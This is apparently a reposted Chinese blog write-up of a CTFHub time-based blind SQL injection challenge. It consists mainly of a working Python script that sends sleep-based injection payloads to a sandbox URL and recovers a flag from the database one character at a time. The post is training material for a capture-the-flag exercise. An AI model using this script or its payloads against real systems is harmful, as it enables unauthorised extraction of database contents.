ctfhub的时间注入

Posted h3zh1

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ctfhub的时间注入相关的知识,希望对你有一定的参考价值。

ctfhub是个新手入门的好地方
前边的注入会了时间注入还是很简单的,有空合理的补充一下二分法和严密性

import requests
import time
url = "http://challenge-8a39656f3810752a.sandbox.ctfhub.com:10080/?id="
database = ""
for i in range(1,50):
	#print("[%d]" %(i) )
	for j in range(32,127):
		#payload = "if(ascii(substr(database(),1,1))>1,sleep(1.5),1)
		#payload =  "if(ascii(substr(database(),%d,1))=%d,sleep(1),1)" %(i,j )
		payload = "if(ascii(substr((select flag from flag),%d,1))=%d,sleep(1),1)" %(i,j )
		
		start = time.time()
		r = requests.get( url+payload ,timeout=5)
		end_time = time.time()
		
		#print(r.status_code)
		if end_time - start > 1 :
			#print(end_time - start)
			database += chr(j)
			print(database)
			break

技术图片

技术图片


以上是关于ctfhub的时间注入的主要内容,如果未能解决你的问题,请参考以下文章

CTFhub时间注入题解

CTFHub——技能树——SQL注入(sqlmap)

[ctfhub]SQL注入

CTFHub-技能树-命令执行

CTFHUB-SQL注入

CTFHub(整数型注入)